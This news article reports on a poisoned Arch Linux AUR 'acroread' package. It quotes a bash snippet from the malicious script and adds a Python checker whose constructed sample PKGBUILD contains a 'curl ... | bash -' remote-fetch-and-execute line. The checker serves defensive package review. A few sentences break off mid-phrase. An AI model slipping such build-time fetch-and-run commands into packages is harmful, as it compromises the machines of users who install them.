Arch Linux PDF package poisoned • The Register


Arch Linux pulled a user-provided AUR (Arch User Repository) package because it contained malicious software.

If you are an Arch Linux user who downloaded a PDF viewer named "acroread" during a short window, you need to delete it. Although the breach is not considered serious, it sparked a debate over the security of unvetted software.

The user repository included the acroread package, which had been dropped by its maintainer. Someone using the handle "xeactor" adopted the package and modified it to download malicious scripts from a remote server.

When this was discovered, the maintainer Eli Schwartz reverted the commits, suspended the xeactor account, and found (and removed) two more packages with similar changes.

A subsequent post on the Arch Linux mailing list suggested "the attack" was more of a warning than a real attack. As Bennett Piater wrote: "A script that creates compromised.txt in root and all the home directories seems to me to be a warning."

Here is the code that created the "warning" text file:

  # Writes the captured log into compromised.txt in /root and every home directory,
  # but only where that file already exists and is writable (the -w test fails on a missing file).
  for x in /root /home/*; do
    if [[ -w "$x/compromised.txt" ]]; then
      echo "$FULL_LOG" > "$x/compromised.txt"
    fi
  done

The modified lines in acroread used curl to download scripts from a remote site, and the script (had it worked) would have reconfigured systemd to restart on a

Lending even more weight to its status as a warning was another message from Schwartz: "Note on the legs of acroread: https://ptpb.pw/~x was executed by the PKGBUILD, which in turn executed But the thing that it installs declares a download function of ss, then tries to run the contents of $uploader to actually download the data collection."

Schwartz said that "as-is", this code would not work.
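The pattern behind this incident, a PKGBUILD that fetches and runs a remote script at build time instead of listing it in the checksummed source=() array, is something a package reviewer can check for mechanically. The script below is added here as an illustration (it is not from the Arch project or from this article); the two sample PKGBUILDs embedded in it are constructed, with placeholder URLs.

```python
import re
from typing import List, Tuple

# Constructed sample PKGBUILDs for this demonstration (not the real acroread files).
CLEAN_PKGBUILD = """\
pkgname=acroread
source=("https://example.invalid/acroread.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 acroread "${pkgdir}/usr/bin/acroread"
}
"""

SUSPECT_PKGBUILD = """\
pkgname=acroread
source=("https://example.invalid/acroread.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 acroread "${pkgdir}/usr/bin/acroread"
  # build-time fetch of an unpinned remote script, the pattern seen in the poisoned package
  curl -s https://paste.invalid/~x | bash -
}
"""

FUNC_START = re.compile(r'^\s*(?:function\s+)?([A-Za-z_][\w-]*)\s*\(\)\s*\{')
NET_FETCH = re.compile(r'\b(curl|wget)\b')
PIPE_TO_SHELL = re.compile(r'\|\s*(ba|z|da)?sh\b')

def find_runtime_fetches(pkgbuild: str) -> List[Tuple[str, int, str]]:
    """Return (function, line_no, severity) for curl/wget calls inside PKGBUILD
    functions. Downloads belong in source=(), which makepkg verifies against the
    checksum arrays; a fetch inside prepare()/build()/package() bypasses that check."""
    hits: List[Tuple[str, int, str]] = []
    current, depth = None, 0
    for no, line in enumerate(pkgbuild.splitlines(), 1):
        if current is None:
            m = FUNC_START.match(line)
            if m:
                current, depth = m.group(1), 1
            continue
        depth += line.count('{') - line.count('}')
        code = line.split('#', 1)[0]          # ignore trailing comments
        if NET_FETCH.search(code):
            severity = 'critical' if PIPE_TO_SHELL.search(code) else 'warning'
            hits.append((current, no, severity))
        if depth <= 0:                        # closing brace of the function
            current = None
    return hits
```

A fetch piped straight into a shell is reported as critical; any other curl/wget call inside a function is reported as a warning for manual review.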

Arch's Giancarlo Razzolini suggested that the fuss over the possibility that user-provided (and therefore unvetted) AUR packages might contain bad code is an overreaction.

"This thread is attracting a lot more attention than is justified," he wrote (oh, and now it's in the media... sorry). "I'm surprised that this type of stupid takeover and introduction of malware does not happen more often," Razzolini added.
